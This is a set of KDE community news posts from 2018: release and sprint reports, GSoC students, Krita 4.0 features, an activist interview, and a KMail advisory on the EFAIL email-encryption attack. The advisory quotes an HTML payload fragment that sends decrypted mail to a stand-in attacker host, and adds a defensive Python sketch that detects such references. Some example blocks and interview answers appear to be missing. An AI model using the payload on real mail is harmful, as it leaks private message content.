Thursday, 17 May 2018. Today KDE unveils a beta release of Plasma 5.13.0.
Members of the Plasma team have been working hard to continue making Plasma a lightweight and responsive desktop which loads and runs quickly, but remains full-featured with a polished look and feel. We have spent the last four months optimising startup and minimising memory usage, yielding faster time-to-desktop, better runtime performance and less memory consumption. Basic features like panel popups were optimised to make sure they run smoothly even on the lowest-end hardware. Our design teams have not rested either, producing beautiful new integrated lock and login screen graphics.
KDE Student Programs is happy to present our 2018 Google Summer of Code students to the KDE Community.
Welcome Abhijeet Sharma, Aman Kumar Gupta, Amit Sagtani, Andrey Cygankov, Andrey Kamakin, Anmol Gautam, Caio Jordão de Lima Carvalho, Chinmoy Ranjan Pradhan, Csaba Kertesz, Demetrio Carrara, Dileep Sankhla, Ferencz Kovács, Furkan Tokac, Gun Park, Iván Yossi Santa María González, Kavinda Pitiduwa Gamage, Mahesh S Nair, Tarek Talaat, Thanh Trung Dinh, Yihang Zhou, and Yingjie Liu!
This year digiKam, KDE's professional photo management application, has three students: Tarek Talaat will be working on supporting Twitter and One Drive services in digiKam export, Thanh Trung Dinh on Web Services tools authentication with OAuth2, and Yingjie Liu on adding the possibility to manually sort the digiKam icon view.
Plasma, KDE's graphical desktop environment, will also be mentoring three students. Abhijeet Sharma will be working on fwupd integration with Discover (KDE's graphical software manager), Furkan Tokac will improve handling for touchpads and mice with Libinput, and Gun Park will port keyboard input modules to Qt Quick and expand scope to cover input method configuration for System Settings.
Another project with three students is Krita, KDE's popular graphic editor and painting application. Andrey Kamakin will improve multithreading in Krita's Tile Manager; Iván Yossi Santa María González (ivanyossi) will optimize Krita Soft, Gaussian and Stamp brushes mask generation to use AVX with Vc Library; and Yihang Zhou (Michael Zhou) is creating a Swatches Docker for Krita.
GCompris, the suite of educational programs and games for young learners, takes two students: Aman Kumar Gupta will port all GTK+ piano activities and get it one step closer to version 1.0, and Amit Sagtani will work on creating bitmap drawing and animation activities while preparing GCompris for version 1.0.
LabPlot, KDE's application for scientific data plotting and analysis, also mentors two students. Andrey Cygankov will add support for importing data from web services in LabPlot, and Ferencz Kovács will be working on plotting of live MQTT data.
Okular, KDE's PDF and document viewer, gets another two students: Chinmoy Ranjan Pradhan will be working on verifying signatures of PDF files, while Dileep Sankhla will implement the FreeText annotation with FreeTextTypeWriter behavior.
Csaba Kertesz (kecsap) will aim to improve the desktop and the Android version of KStars, KDE's planetarium program, while Kavinda Pitiduwa Gamage will work on KGpg, KDE's graphical key management application, to make it better.
Mahesh S. Nair will expand Peruse Creator, adding more features to KDE's easy-to-use comic book reader. Finally, Demetrio Carrara will be working on the WikiToLearn production-ready Progressive Webapp (PWA).
Traditionally, Google Summer of Code starts with an introduction period where students get to know their mentors, after which they start coding. The coding period for 2018 began on May 14, and will last until August 6. We wish all our students a productive, successful, and fun summer!
On Monday, a security vulnerability called EFAIL was published. It affects the OpenPGP and S/MIME email encryption standards and the email clients using them.
What is this about and how is KMail affected? (Spoiler: KMail users are safe by default.)
The discovered vulnerability affects the OpenPGP and S/MIME standards used for end-to-end encryption of emails, which encrypt emails specifically for the intended receivers. This is not to be confused with transport encryption (typically TLS) that is used universally when communicating with an email server. Users not using OpenPGP and S/MIME are not affected by this vulnerability.
End-to-end encryption is usually employed to prevent anyone other than the intended receiver from accessing message content, even if they somehow manage to intercept or accidentally receive an email. The EFAIL attack does not attempt to break that encryption itself. Instead, it applies some clever techniques to trick the intended receiver into decrypting the message, and then sending the clear text content back to the attacker.
KMail relies on GnuPG for the OpenPGP and S/MIME handling, so you might also be interested in the GnuPG team's statement on EFAIL.
The EFAIL research paper proposes several exfiltration channels for returning the clear text content. The easiest one to understand is by exploiting the HTML capabilities of email clients. If not properly controlled, HTML email messages can download external resources, such as images, while displaying an email - a feature often used in corporate environments.
Considerably simplified, the idea is to add additional encrypted content around an intercepted encrypted message. The whole procedure for doing this is quite elaborate and explained in depth in the paper. Let's assume an attacker manages to prefix an intercepted encrypted email with the (encrypted) string "<img src='http://my.site/?" and append an extra "'/>". The result would look something like this, after decryption by the receiver:
An email client that unconditionally retrieves content from the Internet while displaying HTML emails would now leak the email content as part of an HTTP GET request to an attacker-controlled web server - game over.
The OpenPGP standard has a built-in detection mechanism for manipulations of the encrypted content. This provides effective protection against this attack. KMail, or rather the GnuPG stack KMail uses for email cryptography, does make use of this correctly. Not all email clients tested by the EFAIL authors seem to do this correctly, though. Notwithstanding, your OpenPGP encrypted emails are safe from this attack if you use KMail.
The situation with S/MIME is more difficult, as S/MIME itself does not have any integrity protection for the encrypted content, leaving email clients with no way to detect the EFAIL attack. That's a conceptual weakness of S/MIME that can only really be fixed by moving to an improved standard.
Fortunately, this does not mean that your S/MIME encrypted emails cannot be protected in KMail. By default, KMail does not retrieve external content for HTML emails. It only does that if you either explicitly trigger this for an individual email by clicking the red warning box at the top of emails which informs of external content, or if you enable this unconditionally via Settings > Configure KMail > Security > Reading > Allow messages to load external references from the Internet. Starting with version 18.04.01, the latter setting will be ignored for S/MIME encrypted content as an additional precaution. For older versions, we recommend you make sure this setting is disabled.
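The leak described above and the blocking policy described for KMail, as an added example that is not KMail's code: a Python sketch that finds automatically fetched remote references in a decrypted HTML body, shows what the HTTP request would carry, and decides whether loading is allowed. The prefix and suffix are the strings quoted above; the plaintext, the function names and the policy function are assumptions made for illustration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit, unquote

# Attributes a renderer fetches without user action (illustrative, not exhaustive).
AUTO_FETCH_ANY_TAG = {"src", "background", "poster"}
AUTO_FETCH_BY_TAG = {("link", "href"), ("object", "data")}
CSS_URL = re.compile(r"url\(\s*['\"]?([^'\")]+)", re.IGNORECASE)


def is_remote(url):
    """True for URLs that need a network fetch (not cid:, data: or relative paths)."""
    parts = urlsplit(url.strip())
    if parts.scheme.lower() in {"http", "https", "ftp"}:
        return True
    # Protocol-relative form such as //host/path
    return parts.scheme == "" and parts.netloc != ""


class _RefFinder(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.refs = []

    def handle_starttag(self, tag, attrs):
        # Also reached for self-closing tags such as <img .../>.
        for name, value in attrs:
            if value is None:
                continue
            if name == "style":
                candidates = CSS_URL.findall(value)
            elif name in AUTO_FETCH_ANY_TAG or (tag, name) in AUTO_FETCH_BY_TAG:
                candidates = [value]
            else:
                continue
            for url in candidates:
                if is_remote(url):
                    self.refs.append((tag, name, url.strip()))


def find_external_references(html):
    """Return (tag, attribute, url) for every remote resource the HTML would fetch."""
    finder = _RefFinder()
    finder.feed(html)
    finder.close()
    return finder.refs


def exposed_query(url):
    """Text that would reach the remote server in the query part of the GET request."""
    return unquote(urlsplit(url).query)


def may_load_external(setting_enabled, smime_encrypted, user_clicked=False):
    """Model of the policy described in the text (assumption, not KMail source):
    off by default, on after an explicit per-message click, and the global
    setting is ignored for S/MIME encrypted content."""
    if user_clicked:
        return True
    return setting_enabled and not smime_encrypted


# Constructed sample: decrypted body after the manipulation described above.
PREFIX = "<img src='http://my.site/?"
SUFFIX = "'/>"
PLAINTEXT = "Quarterly numbers attached, keep confidential"  # constructed
DECRYPTED = PREFIX + PLAINTEXT + SUFFIX

# Constructed sample: embedded image (cid:) and a plain link, nothing auto-fetched.
BENIGN = '<p>Hi</p><img src="cid:logo@example"><a href="https://example.org/">link</a>'

if __name__ == "__main__":
    for tag, attr, url in find_external_references(DECRYPTED):
        allowed = may_load_external(setting_enabled=True, smime_encrypted=True)
        print(f"<{tag} {attr}> -> {url!r}")
        print("  would expose:", repr(exposed_query(url)))
        print("  action:", "fetch" if allowed else "blocked")
```
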
Furthermore, distribution maintainers can get patches to solve this problem from here:
In order to revoke compromised signing keys, S/MIME relies on certificate revocation lists (CRLs) or the online certificate status protocol (OCSP). These two mechanisms consult an online server defined by the authority managing the respective keys. The EFAIL paper suggests that this might be another possible exfiltration channel, in addition to HTML. However, this hasn't been demonstrated yet, and the GnuPG team thinks it is unlikely to work. It is also a relevant piece of the S/MIME security model, so simply disabling this as a precaution has security implications, too.
Therefore, we have not changed the default settings for this in KMail at this point. The reason is that compromised and thus revoked keys seem to be a more common concern than an elaborate targeted attack that would employ CRL or OCSP as an exfiltration channel (if possible at all). You'll find the corresponding settings for the CRL and OCSP usage under Settings > Configure KMail > Security > S/MIME Validation should you want to review or change them.
Research in email client and email cryptography security is very much appreciated and badly needed, considering how prevalent email is in our daily communication. As the results show, S/MIME is showing its age and is in need of conceptual improvements. Also, EFAIL again highlights the dangers to privacy caused by HTML emails with external references. Most importantly, this shows that your emails are well-protected by KMail and GnuPG, and there is certainly no reason to panic and stop using email encryption.
That said, it's not too early to start planning for Akademy 2019!
In fact, we are now opening the Akademy 2019 Call for Hosts, and looking for a vibrant spot and an enthusiastic crew that will host us.
Would you like to bring Akademy, the biggest KDE event, to your country? Read on to find out how to apply!
A Bit About Akademy
Akademy is KDE's annual get-together where our creativity, productivity and community-bonding reach their peak. Developers, users, translators, students, artists, writers - pretty much anyone who has been involved with KDE - will join Akademy to participate and learn. Contents will range from keynote speeches and two days of dual track talks by the FOSS community, to workshops and Birds of a Feather (BoF) sessions where we plot the future of the project.
The first day serves as a welcoming event. The next two days cover the keynote speakers and other talks. The remaining days are used for BoF sessions, intensive coding and workshops for smaller groups of 10 to 30 people. One of the workshop days is reserved for a day trip, so the attendees can see the local tourist attractions.
What You Get as a Host
Hosting Akademy is a great way to contribute to a movement of global collaboration. You get a chance to host one of the world's largest FOSS communities with contributors from across the globe, and witness a wonderful week of intercultural collaboration in your home town.
You'll get significant exposure to the Free Software community, and develop an understanding of how large projects operate. It is a great opportunity for the local university students, professors, technology enthusiasts and professionals to try their hand at something new.
What We Need from a Host
Akademy requires a location close to an international airport, with an appropriate conference venue that is easy to reach. Organizing Akademy is a demanding task, but you’ll be guided along the entire process by people who’ve been doing it for years. Nevertheless, the local team should be prepared to invest a considerable amount of time into organizing Akademy.
During the sprint, the Plasma team was joined by guests from Qt and Sway WM. Discussion topics included sharing Wayland protocols, input methods, Plasma Browser Integration, tablet mode for Plasma's shell, porting KControl modules to QtQuick, and last but not least, the best beer in Berlin.
Constructive Discussions with SwayWM - Check!
The effort to port Plasma to work on Wayland rather than X continues at a fast pace. Wayland protocols define how applications interact with the display, including tasks essential to Plasma such as declaring which "window" is really a panel. These protocols have to be defined by the Plasma team and preferably standardized with other users of the Linux desktop.
One newcomer to the field is SwayWM - a Wayland version of the i3 window manager. Drew DeVault, the lead developer of the project, joined our Plasma sprint to discuss where Wayland protocols could be shared. The team looked at their Layer Protocol, which covers much of the work of the current plasmashell protocol. We found that this protocol contains some nice ideas and suggested some improvements for the SwayWM developers.
The Plasma Output Management Protocol was also discussed. This protocol defines how external monitors are used, and Sway currently just reloads configuration files as needed. The team will consider this solution if the need for such a protocol arises. Protocols for Remote Access were compared and reviewed along with Pipewire as systems for managing audio and video. Drew wrote a blog post with more information on this topic.
Exciting Collaboration with Qt - Check!
Shawn Rutledge, the lead developer of Qt's new input stack, also joined us for a few days of the sprint. Together, we reviewed the new API and looked at how some of the unique use-cases of Plasma would work with it. The conclusion was that "some parts, including complex drag-and-drop actions, went surprisingly smoothly".
A bunch of design changes were suggested and improvements submitted. Working with Qt developers at this early stage is a great win for both projects, as it saves KDE developers a lot of time when they come to use the new features, while the Qt world gets a nicer result.
Improved Plasma Browser Integration - Check!
Plasma Browser Integration is a fun new feature that will be shipped with Plasma 5.13 next month.
It means Firefox and Chrome/Chromium will use Plasma's file transfer widget for downloads and native Plasma notifications for browser notifications. Moreover, media controls will work with the task manager.
The browser extensions were tidied up, translations fixed, and accounts on the relevant browser store websites set up. Another decision made at the sprint was that we have a collective duty to make sure KDE's new web browser Falkon is at feature-parity in terms of Plasma integration.
Plasma on Pinebook and Tablet Mode - Check!
The team continued to work on convergence with other form factors - in other words, on making Plasma run seamlessly on a variety of devices, both desktop and mobile. Bhushan worked on Plasma Mobile images for devices which support the upstream kernel, which is essential for security and a more up-to-date system on mobile devices.
Rohan worked on making Plasma run smoothly and with all Free drivers on the low-end Pinebook laptop. This goes to show that Plasma can function as a lightweight desktop environment without losing the features.
Lastly, Marco managed to get Plasma working on a convertible laptop with support for switching into tablet mode, illustrating how we can actively shift between form factors.
Talks, Burritos, and Beer - Check!
Throughout the week, we also gave talks to our host company Endocode who kindly lent us their central Berlin offices, complete with a fridge full of alcohol-free beer.
Kdenlive is KDE's advanced video-editor. This April, members of the Kdenlive project met up for five days - from 25th to the 29th - for their spring sprint. The developers Jean-Baptiste Mardelle and Nicolas Carion, along with professional community videomakers Farid Abdelnour, Rémi Duquenne and Massimo Stella, got together at the Carrefour Numérique in Paris to push the project forward.
This is what happened...
Despite a very busy agenda, which included pitching Kdenlive to the general public, the attendees managed to work some new features into the code. For example, the next version of Kdenlive that hits your distro will include a feature that will automatically split video and audio tracks by default into separate tracks. This saves time, since the workflows for editing video and audio are substantially different, and editors often have to separate tracks to work on them individually anyway.
The toolbar that overlays monitors got a makeover and now supports multiple layout guides. The toolbar is translucent, so you can still see what is going on in the clip, and only appears when you move the mouse to the upper right corner of the monitor. This not only looks cool (very important!), but also makes it practical, since it is invisible most of the time, not blocking your view of the clip.
Apart from coding in new features, the team held two public sessions. First they talked with potential contributors. This had an immediate effect, as Camille took it on himself to update the project's wiki, and Elie submitted a patch which added the possibility to manage and download keyboard shortcut templates of other video editors such as Avid, Final Cut and Adobe Premiere Pro. This means an editor used to working with closed-source alternatives will immediately feel at home with Kdenlive.
The second public event was with video-editing enthusiasts. The audience had the opportunity to see Kdenlive in action and find out more about the software, as well as talk with the developers.
Coming to a Theatre Near You
Apart from the incremental improvements that have already made their way into the beta versions of Kdenlive's next release, more exciting features are on the way. During the sprint, the developers agreed on a roadmap of where they want to take Kdenlive next, and made a priority of incorporating Advanced Trimming and Single Track Transitions in the upcoming releases.
Advanced trimming allows you to roll, ripple, slip or slide a clip between two existing ones. This lets you drop a clip onto a track and have the surrounding clips behave in different ways, cropping or displacing frames automatically according to what you want to do. With Single Track Transitions, on the other hand, you can overlap one clip onto another on the same track and apply a transition between the two, instead of having to figure out transitions across several tracks.
Longer-term goals include Multicam Editing. This comes in handy when you have filmed the same event from different angles with more than one camera. Kdenlive will help you sync up the action so you can cut from one to the other seamlessly. Another goal is to support faster renders, splitting the workload between the multiple cores most modern computers come with, as well as sending heavy workloads off to the GPU.
One final thing to look forward to is the integration of Kdenlive with other Free Software video- and audio-editing tools. The developers are looking at Blender, Natron and Ardour, as well as graphics-editing tools like GIMP, Krita and Inkscape. The plan is to incorporate their special and specific features into Kdenlive and make sure all these tools can work seamlessly together. This would mean, for example, that you could create a 3D text effect in Blender and bridge it into Kdenlive without having to go through time-consuming exports and imports. Or you could edit a sequence in Kdenlive and frameserve it to do the compositing in Natron.
As with many Free Software projects, the Kdenlive team can always use more contributors. New developers can help get features incorporated sooner and bugs squashed more efficiently. Documenters and translators can help make the guides, manuals and websites more accessible to a larger audience. Join the mailing list, Telegram group, or drop by the #kdenlive channel on Freenode to find out how you, too, can help.
Kdenlive is already a very capable video-editor, but the work the team is carrying out promises to make it a world-class tool that both aficionados and professionals can use. The latest version of Kdenlive is available in many distributions, as well as in AppImage and Flatpak formats. Vincent Pinon is also working on the Windows port which is currently in a Beta stage.
The rest of the week will be taken up by BoF sessions, workshops and sprints, in which KDE community members will be working elbow-to-elbow and learning from each other, intent on building a better KDE for everybody.
For most of the year, KDE—one of the largest free and open software communities in the world—works on-line by email, IRC, forums and mailing lists. Akademy provides all KDE contributors the opportunity to meet in person to foster social bonds, work on concrete technology issues, consider new ideas, and reinforce the innovative, dynamic culture of KDE. Akademy brings together artists, designers, developers, translators, users, writers, sponsors and many other types of KDE contributors to celebrate the achievements of the past year and help determine the direction for the next year. Hands-on sessions offer the opportunity for intense work bringing those plans to reality. The KDE Community welcomes companies building on KDE technology, and those that are looking for opportunities. For more information, please contact The Akademy Team.
The sprint will run from the 25th to the 29th of April, and two days will be open to the public. On Friday, 27th of April, from 4pm to 6pm the event will be open to anyone interested in getting involved. You can meet the team and learn how you can contribute to the project. On Saturday, 28th of April at 2.45pm, there will be a public presentation. You can discover Kdenlive as used by professional editors and learn about the new features.
Just in case you can't make it to Paris, but can get to the south of Spain: directly after the sprint, the team will fly to Seville to participate in the Libre Graphics Meeting.
That Krita has become one of the most popular applications for painting among digital artists is an understatement. The great thing is that, with every new version, Krita just gets better and better. The latest release is a perfect example of that. Check out what you can look forward to in the new 4.0 version:
1. SVG for Vector Tools
Krita 4.0 will use SVG on vector layers by default, instead of the prior reliance on ODG. SVG is the most widely used open format for vector graphics out there. Used by "pure" vector design applications, SVG on Krita currently supports gradients and transparencies, with more effects coming soon.
Krita 4.0 also includes an improved set of tools for editing objects created on vector layers, letting you tweak the fill, the shape, and other features of your vector elements.
2. New Text Tool
The usability of the text tool has been vastly improved. The tool has been re-written to be more reliable, and has a better base for future expansion. As it also follows the SVG standard (instead of the prior ODT), it is compatible with more design applications.
3. Python Scripting
Krita now comes with a brand new Python scripting engine. This engine lets you write snippets of code that create and manipulate images, add dockers, entries to the menu, and much more. To get you started, the creators have included a large amount of example scripts. In Krita's Settings dialog, you can enable or disable Python plugins. Check out the manual and learn how to pythonize your Krita.
Note that this is the first release to include scripting, so it is very much a work in progress at this stage. Be advised that some things will work, but, for those that don't... Please tell the team!
4. New Brushes
If there is one thing Krita is famous for, that is its wide variety of brushes. Krita 4.0 has a special surprise in that department: David Revoy, the creator of Pepper and Carrot, has added his own personal set of brushes to this version.
5. Colorize Mask Tool
The new Colorize Mask Tool allows you to quickly and easily fill areas of line-art images with color. How it works: you create the mask for your line-art image, and then paint a streak of color into each area. The feature will automatically and intelligently fill each region with the colors you painted in, saving you the trouble of having to paint everything by hand or using the "dumb" fill tool.
Masked brushes are created by combining two brushes with each other in different ways. Say you have a brush in the shape of a heart, and then a soft sponge brush. If you combine them using the multiply operation, you will get a mix of both - a completely new brush!
As for performance improvements, Krita now multi-threads the pixel brush engine. This means Krita is now smart enough to let each of your computer's cores calculate the dabs separately, and also have them work together. Use the performance settings to let Krita know how many cores it should use. These changes only affect the pixel brush engine for now, but the feature will later be expanded to other engines like the color smudge.
Also, all brushes now have an Instant Preview threshold property. This speeds up a lot of smaller brushes that didn't have any performance improvement features in prior versions. Instant Preview will automatically turn on when the size of a brush changes by a certain amount.
Both things combined make painting with Krita a more fluid and pleasurable experience.
Okay, so that was 7 things. But the fact is that Krita has long since transcended its humble origins as a clone of other design applications, and has become the tool of choice for digital painters regardless of the platform they use.
Dan Bielefeld is an activist who works for a South Korean NGO. Dan worked in the Washington, D.C. area training young activists in the areas of politics and journalism before going into researching atrocities committed by the North Korean regime. He is currently the Technical Director of the Transitional Justice Working Group and helps pinpoint the locations of mass burial and execution sites using mapping technologies.
Dan will be delivering the opening keynote at this year's Akademy and he kindly agreed to talk to us about activism, Free Software, and the sobering things he deals with every day.
Paul Brown: Hello Dan and thanks for agreeing to sit down with us for this interview.
Dan: Yes, we have a mapping project that tries to identify specific coordinates of sites with evidence related to human rights violations.
Paul: And you were a web designer before joining the organization... I've got to ask: How does one make the transition from web designer to human rights activist?
Dan: I was a web developer for several years before moving to Korea. When I moved here, I enrolled as a Korean language student and also spent most of my free time volunteering with North Korean human rights groups. So, unfortunately, that meant putting the tech stuff on hold for a while (except when groups wanted help with their websites).
Paul: You are originally from the US, right?
Dan: Yes, from Wisconsin.
Paul: Was this a thing that preoccupied you before coming to Korea?
Dan: I initially came on a vacation with no idea that I'd one day live and work here. In the lead-up to that trip, and especially after that trip, I sought out more information about Korea, which inevitably brought me repeatedly to the subject of North Korea.
Most of the news about North Korea doesn't grab my attention (talking about whether to resume talking, for instance), but the situation of regular citizens really jumped out at me. For instance, it must've been in 2005 or so that I read the book The Aquariums of Pyongyang by a man who had literally grown up in a prison camp because of something his grandfather supposedly did. This just didn't seem fair to me. I had thought the gulags were only a thing of history, but I learned they still exist today.
Paul: Wait... So people can inherit "crimes" in North Korea?
Dan: They call it the "guilt-by-association" system. If your relative is guilty of a political crime (e.g., defected to the South during the Korean War), up to three generations may be punished.
Paul: Wow. That is awful, but somehow I feel this is not the most awful thing I am going to hear today...
Dan: For a long time I thought it was just North Korea, but I have since learned that this logic / punishment method is older than the division of the North and South. For a long time after the division, in the South it was hard to hold a government position if your relative was suspected of having fled to the North, for instance.
Paul: What's your role in Transitional Justice Working Group?
Dan: I'm the technical director, so I'm responsible for our computer systems and networks, which includes our digital security. I also manage the mapping project, and I am also building our mapping system.
Paul: Digital security... I read that North Korea is becoming a powerhouse when it comes to electronic terrorism. How much credibility do these stories have? I mean, they seem to be technologically behind in nearly everything else.
Dan: This is a really interesting question and the answer is very important to my work, of course.
Going up against great powers like the US, the North Korean leadership practices asymmetrical warfare. Guerilla warfare, terrorism, these are things that can have a big impact with relatively little resources against a stronger power.
In digital security, offense tends to be easier than defense, so they naturally have gravitated online. Eike [Hein -- vice-president at KDE e.V.] and I went to a conference last year at which a journalist, Martyn Williams of NorthKoreaTech.org said they train thousands of hackers from an early age. The average person in North Korea doesn't have a lot of money and may not even have a computer, but those the regime identifies and trains will have used computers and received a great deal of training from an early age. They do this not only for cyber-warfare, but to earn money for the regime. For instance, the $81 million from the Bangladesh bank heist.
Paul: Ah, yes! They did Wannacry too.
Paul: Do your systems get attacked?
Dan: One of our staff members recently received a targeted phishing email that looked very much like a proper email from Google. The only thing not real was the actual URL it went to. Google sent her the warning about being targeted by state-sponsored attackers and recommended she join their Advanced Protection Program, which they launched last year for journalists, activists, political campaign teams, and other high-risk users.
We of course do our best to monitor our systems, but the reality today is that you almost have to assume they're already in if they're motivated to do so.
Paul: That is disturbing. So what do you do about that? What tools do you use to protect and monitor your systems?
Dan: What I've learned over the last three years is that the hardest part of digital security is the human element. You can have the best software or the best system, but if the password is 123456 or is reused everywhere, you aren't really very secure.
We try to make sure that, for instance, two-factor authentication is turned on for all online accounts that offer it -- for both work and personal accounts. You have to start with the low-hanging fruit, which is what the attackers do. No reason to burn a zero-day if the password is "password". Getting people to establish good digital hygiene habits is crucial. It's sort of like wearing a seatbelt -- using 2FA might take extra time every single time you do it, and 99.9% of the time, it's a waste of time, but you'll never really know in advance when you'll really need it, so it's best to just make it a habit and do it every time.
Another thing, of course, is defense in layers: don't assume your firewall stopped them, etc.
Paul: What about your infrastructure? Bringing things more to our terrain: Do you rely on Free Software or do you have a mix of Free and proprietary? Are there any tools in particular you find especially useful in your day-to-day?
Dan: I personally love FOSS and use it as much as I can. Also, being at a small NGO with a very limited budget, it's not just the freedom I appreciate, but the price often almost makes it a necessity.
Paul: But surely having access to the code makes it a bit more trustworthy than proprietary blackboxes. Or am I being too biased here?
Dan: Not all of my colleagues have the same approach, but most of them use, for instance, LibreOffice every day. For mapping, we use Postgres (with PostGIS) and QGIS, which are wonderful. QGIS is a massive project that so far we've only scratched the surface of. We also use Google Earth, which provides us with imagery of North Korea for our interviews (I realize GE is proprietary).
I agree, though, that FOSS is more trustworthy -- not just for security, but privacy reasons. It doesn't phone home as much!
Paul: What about your email server, firewalls, monitoring software, and so on? What is that? FLOSS or proprietary?
Dan: Mostly FLOSS, but one exception, I must admit, is our email hosting. We do not have the resources to safely run our own email. A few years ago we selected a provider that was a partner with a FOSS project to run our own email service, but we ultimately switched to Google because that provider was slow to implement two-factor authentication.
Dan: The human rights situation in North Korea is very disturbing and the sad thing is it's continued for 60+ years. The UN's Report of the Commission of Inquiry on human rights in the Democratic People’s Republic of Korea from 2014 is a must-read on the general human rights situation in North Korea. From the principal findings section (para. 24), "The commission finds that systematic, widespread and gross human rights violations have been and are being committed by the Democratic People’s Republic of Korea. In many instances, the violations found entailed crimes against humanity based on State policies."
Their mandate looked at "violations of the right to food, the full range of violations associated with prison camps, torture and inhuman treatment, arbitrary arrest and detention, discrimination; in particular, in the systemic denial and violation of basic human rights and fundamental freedoms, violations of the freedom of expression, violations of the right to life, ... enforced disappearances, including in the form of abductions of nationals of other States," and so on.
For our mapping project, we published our first report last year, based on interviews with 375 escapees from North Korea who have now settled in South Korea.
They collectively told us the coordinates of 333 killing sites, usually the sites of public executions, which local residents, including school children, are encouraged and sometimes forced to watch. It should be noted that this number hasn't been consolidated to eliminate duplicates. Some people reported more than one site, others none at all, but on average, almost one site per person was reported.
Paul: And how do you feel about the situation? I am guessing you have met North Korean refugees passing through your workplace and that you, like most of us, come from a very sheltered and even cushy Western society background. How do you feel when faced with such misery?
Dan: It's a good question and hard to put into words what I feel. I guess, more than anything, I find the North Korean regime so unfair. Those we met in Seoul have been through so much, but they also are the ones who overcame so many obstacles and now have landed on their feet somewhere. It's not easy for them, but usually the longer they're here, the better they end up doing.
Continuing about the mapping project's first report findings, from those 375 interviewees, we were also told the coordinates of 47 "body sites" - we use the term "body sites" because it's more general than burial sites. Most of the sites were burial sites, but some were cremation sites or places where bodies had been dumped without being buried, or stored temporarily before being buried. This 47 figure IS consolidated / de-duped (from 52), unlike the killing sites number.
Paul: You manually plot sites on maps, correct? You have to rely on witnesses remembering where they saw things happen...
Dan: We manually plot them using Google Earth, yes. During the interview, our interviewer (who himself is originally from the North) looks together with the interviewee at Google Earth's satellite imagery. You have to get used to looking down at the world, which takes some getting used to for some people.
Paul: Is there no technology that would help map these things? Some sort of... I don't know... thermal imaging from satellites?
Dan: Our goal eventually would be to interview all 30,000-plus North Koreans who've resettled in South Korea. The more we interview, and the more data points we get, the more we can cross-reference testimonies and hopefully get a better picture of what happened at these locations. I went to the big FOSS4G (G=Geospatial) conference last year in Boston and also the Korean FOSS4G in Seoul, and got to meet people developing mapping systems on drones. The only problem right now with drones is that flying them over North Korea will probably be seen as an act of war.
When we get enough data points, we could use machine learning to help identify more potential burial sites across all of North Korea. Something similar is being done in Mexico, for instance, where they predict burial sites of the victims of the drug wars.
Paul: You mentioned that the crimes have been going on for 60 years now. What should other countries be doing to help stop the atrocities? Because it seems to me that whatever they have been doing hasn't worked that well...
Dan: Very true, that. North Korea is very good at playing divide and conquer. The rivalry between the Soviets and the Chinese, for instance, allowed them to extract more aid or resources from them.
They also try to negotiate one-on-one; they don't want to sit down to negotiate with the US and South Korea at the same time, only with one or the other, for instance. North Korea - South Korea and North Korea - US meetings are dramatically being planned right now, and it puts a lot of stress on the alliance between the US and South Korea. That's definitely a goal of North Korea's leadership. Again, divide and conquer.
So one thing that's an absolute must is for South Korea to work very closely with other countries and for them to all hold to the same line. But there are domestic and external forces that are pulling all of the countries in other directions, of course.
I would say to any government to always keep human rights on the agenda. This does raise the bar for negotiations, but it also indicates what's important. It also sends an important message to the people of North Korea, whom we’re trying to help.
I also think strategies that increase the flow of information into, out of, and within North Korea are key. For instance, the BBC recently opened a Korea-language service for the whole peninsula including North Korea. And Google’s Project Loon and Facebook’s similar project with drones could theoretically bring the internet to millions.
Paul: Do you think these much-trumpeted US - North Korean negotiations will happen? And if so, will anything productive come from them?
Dan: I really don't know. Also, one can't talk about all this without mentioning that China is North Korea's enabler, so if you want to significantly change North Korea, you have to influence China.
To more directly answer the question, two US presidents (one from each party) made big deals with the North Koreans but the deals fell apart. We’ll see.
Paul: We've covered what governments can do, but what can private citizens do to help?
Dan: One major thing is to help amplify the voices of North Korean refugees and defectors. There are a few groups in Seoul, for instance, that connect English speakers with North Korean defectors who want to learn and practice their English. There are small North Korean defector communities in cities like London, Washington DC, etc. I don't know about Berlin, but I wouldn't be surprised!
That's at the individual-to-individual level, but also, those with expertise as software developers could use their skills to empower North Korean refugee organizations and activists, as well as other North Korean human rights groups.
Paul: Empower how? Give me a specific thing they can do.
Dan: For instance, one time I invited an activist to the Korea KDE group. He and some KDE community leaders had a very interesting discussion about how to use Arduino or something similar to control a helium-filled balloon to better drop leaflets, USB sticks, etc. over North Korea.
Paul: That is a thing? What do the Arduinos do, control some sort of rotor?
Paul: What do you put on the sticks and cards? "The Interview"? "Team America"?
Dan: There are several groups doing this, which is good, since they all probably have different ideas of what North Koreans want to watch. I think South Korean TV shows, movies, and K-Pop are staples. I have heard Wikipedia also goes on to some sticks, as do interviews with North Koreans resettled in South Korea...
Paul: Dan, thank you so much for your time.
Dan: Thanks so much, Paul, I look forward to meeting you and the rest of the KDE gang this summer.
Paul: I too look forward to seeing you in Vienna.
Dan will be delivering the opening keynote at Akademy 2018 on the 11th of August. Come to Akademy and find out live how you too can fight injustice from the realms of Free Software.
For most of the year, KDE—one of the largest free and open software communities in the world—works on-line by email, IRC, forums and mailing lists. Akademy provides all KDE contributors the opportunity to meet in person to foster social bonds, work on concrete technology issues, consider new ideas, and reinforce the innovative, dynamic culture of KDE. Akademy brings together artists, designers, developers, translators, users, writers, sponsors and many other types of KDE contributors to celebrate the achievements of the past year and help determine the direction for the next year. Hands-on sessions offer the opportunity for intense work bringing those plans to reality. The KDE Community welcomes companies building on KDE technology, and those that are looking for opportunities.